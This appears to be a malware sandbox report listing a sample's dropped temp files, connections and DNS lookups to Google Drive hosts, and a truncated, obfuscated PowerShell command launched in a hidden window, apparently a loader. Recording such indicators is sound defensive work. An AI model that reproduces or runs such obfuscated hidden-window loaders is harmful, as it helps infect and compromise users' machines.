Technical Information
- %TEMP%\aspherical.txt
- %WINDIR%\temp\cab2240.tmp
- %WINDIR%\temp\tar2241.tmp
- %WINDIR%\temp\cab2240.tmp
- %WINDIR%\temp\tar2241.tmp
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#demokrats eviggyldigt Tovnings womaning Opsendingen #>;$Phylarch=(cmd /c set /A 115^^0);Function Logaoedic169 ([String]$Coppa){$Kafila=8;$Writerling=Hexacorallan186($Coppa);For($daasernes=7;...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#demokrats eviggyldigt Tovnings womaning Opsendingen #>;$Phylarch=(cmd /c set /A 115^^0);Function Logaoedic169 ([String]$Coppa){$Kafila=8;$Writerling=Hexacorallan186($Coppa);For($daasernes=7;...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0